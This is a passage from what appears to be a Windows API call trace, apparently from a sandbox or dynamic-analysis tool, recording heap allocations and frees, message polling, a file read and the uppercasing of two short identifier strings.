hHeap=0x2af0000) returned 1 [0222.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0222.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0222.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0222.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0222.063] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0222.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0222.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0222.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0222.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54ef020 [0222.067] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0222.067] ReadFile (in: hFile=0x4dc, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0xf74c, lpOverlapped=0x0) returned 1 [0222.069] ReadFile (in: hFile=0x4dc, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0222.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0222.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf74c) returned 0x2a8a138 [0222.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54ef020 | out: hHeap=0x2af0000) returned 1 [0222.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0222.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0222.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0222.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0222.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf74c) returned 0x2aae878 [0222.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0222.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.074] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0222.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0222.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0222.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf74c) returned 0x2a8a138 [0222.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0222.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0222.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0222.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0222.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0222.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0222.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0222.075] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0222.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0222.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf74c) returned 0x2a8a138 [0222.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0222.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0222.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab008 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0222.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0222.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf74c) returned 0x2abdfd0 [0222.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0222.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0222.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0222.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0222.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0222.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0222.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0222.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0222.078] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0222.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0222.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0222.078] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0222.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0222.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0222.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0222.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0222.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0222.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0222.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0222.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0222.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0222.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0222.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0222.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0222.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0222.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0222.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0222.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0222.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0222.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0222.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0222.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0222.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0222.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 